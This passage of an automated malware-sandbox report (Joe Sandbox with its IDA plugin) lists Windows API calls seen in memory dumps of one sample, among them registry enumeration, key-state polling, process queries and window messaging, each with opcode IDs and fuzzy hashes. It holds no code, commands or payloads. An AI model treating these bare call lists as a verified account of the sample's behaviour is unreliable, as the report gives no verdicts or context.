                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: BuffCharUpper
                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                              • API String ID: 3964851224-769500911
                                                              • Opcode ID: 2ba08271f9e359f9b2b68cd91abd4a378a45cbe0f207c2b72b9d5964110c3e38
                                                              • Instruction ID: e61f98d31fae9714ed9c338df4e5a2300e656c9e54dbd1d1e3d4551d6d6e3fa1
                                                              • Opcode Fuzzy Hash: 2ba08271f9e359f9b2b68cd91abd4a378a45cbe0f207c2b72b9d5964110c3e38
                                                              • Instruction Fuzzy Hash: 18118E359002499FCF00EF55D8518FEB7B5FF25309B10846AD819672A2EB366D0ACB48
                                                              APIs
                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 004AEC07
                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 004AEC37
                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 004AED6A
                                                              • CloseHandle.KERNEL32(?), ref: 004AEDEB
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                              • String ID:
                                                              • API String ID: 2364364464-0
                                                              • Opcode ID: efcbf0502f2b6895941cde168376644724b18b63886ee4e6a9e59386e27a5269
                                                              • Instruction ID: a4c656ba251f4604fd26d37ec8af6a13ddf456307c85db96d9b25ae0ee8432f3
                                                              • Opcode Fuzzy Hash: efcbf0502f2b6895941cde168376644724b18b63886ee4e6a9e59386e27a5269
                                                              • Instruction Fuzzy Hash: 0781A1716003009FD724EF29C886F2AB7E5AF99714F14881EF9599B3D2DAB4EC04CB59
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                              • String ID:
                                                              • API String ID: 1559183368-0
                                                              • Opcode ID: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                              • Instruction ID: b18c6f00eb23dd8b5e2ed11aaa4ea8e60ec089dad47d86c1e1e2dc410515d365
                                                              • Opcode Fuzzy Hash: 1d92f2bce51b0a0de234b56dfad0c5d103c922ba67c2ed527f53aae8e5802bd0
                                                              • Instruction Fuzzy Hash: 8C511A30A00B09EBCB148E65D85067F77B2AF41326F14872FFC25963C6E7789D588B49
                                                              APIs
                                                                • Part of subcall function 00437DE1: _memmove.LIBCMT ref: 00437E22
                                                                • Part of subcall function 004B0E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004AFDAD,?,?), ref: 004B0E31
                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004B00FD
                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004B013C
                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 004B0183
                                                              • RegCloseKey.ADVAPI32(?,?), ref: 004B01AF
                                                              • RegCloseKey.ADVAPI32(00000000), ref: 004B01BC
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                                                              • String ID:
                                                              • API String ID: 3440857362-0
                                                              • Opcode ID: 33ff531982bc89e616aaa54ffa3676b73d156aa878de9b3c0f541709729989c0
                                                              • Instruction ID: 5e578814daa62eee309834d4cd50126ec173471724600a99ef0d85101819e7b5
                                                              • Opcode Fuzzy Hash: 33ff531982bc89e616aaa54ffa3676b73d156aa878de9b3c0f541709729989c0
                                                              • Instruction Fuzzy Hash: 39516D71208204AFD714EF58CC81EABB7E9FF88318F40492EF595872A1DB35E905CB66
                                                              APIs
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004AD927
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004AD9AA
                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 004AD9C6
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 004ADA07
                                                              • FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 004ADA21
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00497896,?,?,00000000), ref: 00435A2C
                                                                • Part of subcall function 00435A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00497896,?,?,00000000,?,?), ref: 00435A50
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 327935632-0
                                                              • Opcode ID: 00f556488e576b2324f4fac41c84967437c19167e95f972f3ac2a56907396eb8
                                                              • Instruction ID: 3c3356efa7cbc2811293e4b7ff662cf22703a315952e3640fb1249463ee04b4c
                                                              • Opcode Fuzzy Hash: 00f556488e576b2324f4fac41c84967437c19167e95f972f3ac2a56907396eb8
                                                              • Instruction Fuzzy Hash: DB512975A00205DFCB00EFA9C4849AEB7B4FF19314F04816AE85AAB312D738ED46CF55
                                                              APIs
                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 0049E61F
                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 0049E648
                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0049E687
                                                                • Part of subcall function 00439837: __itow.LIBCMT ref: 00439862
                                                                • Part of subcall function 00439837: __swprintf.LIBCMT ref: 004398AC
                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 0049E6AC
                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0049E6B4
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                              • String ID:
                                                              • API String ID: 1389676194-0
                                                              • Opcode ID: 1a5d6c79082fc237f71ab62e4d36371e221595ac5f915ef44164a4425438b8c5
                                                              • Instruction ID: ab694512dc93015156489160799cec1eb37182a0ff96fb25fc721653c1d2ee81
                                                              • Opcode Fuzzy Hash: 1a5d6c79082fc237f71ab62e4d36371e221595ac5f915ef44164a4425438b8c5
                                                              • Instruction Fuzzy Hash: E8510A39A00105DFCB05EF65C9819AEBBF5EF49314F1480AAE809AB362CB35ED15DF54
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 51c919d021ecd504a73058d0dca54cdb1eb4a2b3d6450d009f8d8f20a6dcea4d
                                                              • Instruction ID: 636e4c5aa972f5d438a6c1233cc2438f745126c90c9ed9c87e57a53b2af703f4
                                                              • Opcode Fuzzy Hash: 51c919d021ecd504a73058d0dca54cdb1eb4a2b3d6450d009f8d8f20a6dcea4d
                                                              • Instruction Fuzzy Hash: D241B335904114ABD760DF28CC48FEABBA4EB09310F144266E915A73E1C7389D65DA7A
                                                              APIs
                                                              • GetCursorPos.USER32(?), ref: 00432357
                                                              • ScreenToClient.USER32(004F57B0,?), ref: 00432374
                                                              • GetAsyncKeyState.USER32(00000001), ref: 00432399
                                                              • GetAsyncKeyState.USER32(00000002), ref: 004323A7
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: AsyncState$ClientCursorScreen
                                                              • String ID:
                                                              • API String ID: 4210589936-0
                                                              • Opcode ID: 41785b240e6601ae1905b20ac74bbba3f8292ccb75e9e5a7988f482834c64deb
                                                              • Instruction ID: 7036231bce9eaeb2300a3b4c2350970a07d1e8bd268525f1ff6fafc568d54a1e
                                                              • Opcode Fuzzy Hash: 41785b240e6601ae1905b20ac74bbba3f8292ccb75e9e5a7988f482834c64deb
                                                              • Instruction Fuzzy Hash: 54418335604115FBCF199F69CC44AEABB74FB09364F20431BF828D22A0D7789D94DBA6
                                                              APIs
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004863E7
                                                              • TranslateAcceleratorW.USER32(?,?,?), ref: 00486433
                                                              • TranslateMessage.USER32(?), ref: 0048645C
                                                              • DispatchMessageW.USER32(?), ref: 00486466
                                                              • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00486475
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Message$PeekTranslate$AcceleratorDispatch
                                                              • String ID:
                                                              • API String ID: 2108273632-0
                                                              • Opcode ID: 191270fb0f4669ae825d20717867bcc8e93864b814db3abb251a2c70cd575988
                                                              • Instruction ID: 3bb6802debbd126dc1f36d43bd20c5b0fd041aec41539aeb0a6b8000066287a6
                                                              • Opcode Fuzzy Hash: 191270fb0f4669ae825d20717867bcc8e93864b814db3abb251a2c70cd575988
                                                              • Instruction Fuzzy Hash: EB31E931900606AFDBA4EFB4CC44FBF7BACAB00700F120A77E915C2260E7299459DB5D
                                                              APIs
                                                              • GetWindowRect.USER32(?,?), ref: 00488A30
                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 00488ADA
                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00488AE2
                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 00488AF0
                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00488AF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessagePostSleep$RectWindow
                                                              • String ID:
                                                              • API String ID: 3382505437-0
                                                              • Opcode ID: a663ea8c3f046860806e6f6cd6975b638e8a534f8b930f629c36d94ef7447beb
                                                              • Instruction ID: 8e164b1faf137524f05c76d21caaa54d26d68ecd26f86458f36ace3b4e5875b1
                                                              • Opcode Fuzzy Hash: a663ea8c3f046860806e6f6cd6975b638e8a534f8b930f629c36d94ef7447beb
                                                              • Instruction Fuzzy Hash: 4831E071900219EBDF18DFA8DD4CA9E3BB5EB04315F10862AF928E62D0C7B49D14CB94
                                                              APIs
                                                              • IsWindowVisible.USER32(?), ref: 0048B204
                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0048B221
                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0048B259
                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0048B27F
                                                              • _wcsstr.LIBCMT ref: 0048B289
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                              • String ID:
                                                              • API String ID: 3902887630-0
                                                              • Opcode ID: 60811685190c554d55bfa4f2ccc78475cb2429bf2c162046f1c3fe9edf48f0f1
                                                              • Instruction ID: a3321e107a4f19de3af6d4272d22984969399ac28715ac9339c2955e8b7d4985
                                                              • Opcode Fuzzy Hash: 60811685190c554d55bfa4f2ccc78475cb2429bf2c162046f1c3fe9edf48f0f1
                                                              • Instruction Fuzzy Hash: B321D3722042006FEB25AB799C09E7F7B98DB49750F10417FFC08DA262EB699C4197A8
                                                              APIs
                                                                • Part of subcall function 00432612: GetWindowLongW.USER32(?,000000EB), ref: 00432623
                                                              • GetWindowLongW.USER32(?,000000F0), ref: 004BB192
                                                              • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 004BB1B7
                                                              • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 004BB1CF
                                                              • GetSystemMetrics.USER32(00000004), ref: 004BB1F8
                                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,004A0E90,00000000), ref: 004BB216
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$Long$MetricsSystem
                                                              • String ID:
                                                              • API String ID: 2294984445-0
                                                              • Opcode ID: a737a7414ddeede255a3afa4d15df666d819d5d4dba2e5cfaacdb748297a1377
                                                              • Instruction ID: 59ebe9c46189c30684df7a25b2796984920dbe7118a3c3bc4b30f4967b6859d9
                                                              • Opcode Fuzzy Hash: a737a7414ddeede255a3afa4d15df666d819d5d4dba2e5cfaacdb748297a1377
                                                              • Instruction Fuzzy Hash: 8A21A271910611AFCB149F38CC08AAA3BA4EB05361F10473AFD36D72E0D7749821DBA8
                                                              APIs
                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00489320
                                                                • Part of subcall function 00437BCC: _memmove.LIBCMT ref: 00437C06
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00489352
                                                              • __itow.LIBCMT ref: 0048936A
                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00489392
                                                              • __itow.LIBCMT ref: 004893A3
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$__itow$_memmove
                                                              • String ID:
                                                              • API String ID: 2983881199-0
                                                              • Opcode ID: 8001ebe095e0d4ed85b44f4bc795fa9bf02678cef6e1590dc9b1f360bff64fa8
                                                              • Instruction ID: 407daabc41d2823b3c8e6f435ababe96183c85ee8e8ece07b63e50f6438626b4
                                                              • Opcode Fuzzy Hash: 8001ebe095e0d4ed85b44f4bc795fa9bf02678cef6e1590dc9b1f360bff64fa8
                                                              • Instruction Fuzzy Hash: 16210731700208BBDB20AE658C85EFE7BACEB4D714F08502BFD44E72C1D6B88D559799
                                                              APIs
                                                              • IsWindow.USER32(00000000), ref: 004A5A6E
                                                              • GetForegroundWindow.USER32 ref: 004A5A85
                                                              • GetDC.USER32(00000000), ref: 004A5AC1
                                                              • GetPixel.GDI32(00000000,?,00000003), ref: 004A5ACD
                                                              • ReleaseDC.USER32(00000000,00000003), ref: 004A5B08
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: Window$ForegroundPixelRelease
                                                              • String ID:
                                                              • API String ID: 4156661090-0
                                                              • Opcode ID: f4e77e5e31d367dc6562c36a1b8ba46cec13eded2aa50ea74641c2c72c9bc58f
                                                              • Instruction ID: 67536d3427238618935232d979621ae4b4bb1e27277b07591d411cbbc3531f3d
                                                              • Opcode Fuzzy Hash: f4e77e5e31d367dc6562c36a1b8ba46cec13eded2aa50ea74641c2c72c9bc58f
                                                              • Instruction Fuzzy Hash: 2721C335A00104AFDB04EFA9DD84A9ABBE5EF59310F14857EF809D7362CA74EC05CB94
                                                              APIs
                                                              • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0043134D
                                                              • SelectObject.GDI32(?,00000000), ref: 0043135C
                                                              • BeginPath.GDI32(?), ref: 00431373
                                                              • SelectObject.GDI32(?,00000000), ref: 0043139C
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: ObjectSelect$BeginCreatePath
                                                              • String ID:
                                                              • API String ID: 3225163088-0
                                                              • Opcode ID: 6177efe3e0463b56f52323921f2e94284a9212d0d564701140f77dcd2681bbb1
                                                              • Instruction ID: cbef909dd5e44599ebbadc9273a9976ae43ebe659a8b2bb5316251c602a8f0ac
                                                              • Opcode Fuzzy Hash: 6177efe3e0463b56f52323921f2e94284a9212d0d564701140f77dcd2681bbb1
                                                              • Instruction Fuzzy Hash: A3215C30800A08EBEB10AF25EC0477A7BA8EB083A1F144637E914962B0D77498B5DF99
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_430000_BLv4mI7zzY.jbxd
                                                              Similarity
                                                              • API ID: _memcmp
                                                              • String ID:
                                                              • API String ID: 2931989736-0
                                                              • Opcode ID: fcb7e3524e29ee66ca7716e6981b9c77622c6b7491d1bc0ae7f1a9981127c959
                                                              • Instruction ID: 7ab6f9498d1e1fe838d7d2b8ef3819728241e3b7e1584b90ca72a6bf128146cf
                                                              • Opcode Fuzzy Hash: fcb7e3524e29ee66ca7716e6981b9c77622c6b7491d1bc0ae7f1a9981127c959
                                                              • Instruction Fuzzy Hash: 4A016D616002057EE2047A126E42FBFA35CDE21388B14442BFD0597342EB98AE1583ED
                                                              APIs
                                                              • GetCurrentThreadId.KERNEL32 ref: 00494ABA
                                                              • __beginthreadex.LIBCMT ref: 00494AD8
                                                              • MessageBoxW.USER32(?,?,?,?), ref: 00494AED
                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00494B03
                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00494B0A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2136918302.0000000000431000.00000020.00000001.01000000.00000003.sdmp, Offset: 00430000, based on PE: true
                                                              • Associated: 00000000.00000002.2136574338.0000000000430000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004BF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2136978768.00000000004E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137030057.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.2137052112.00000000004F7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
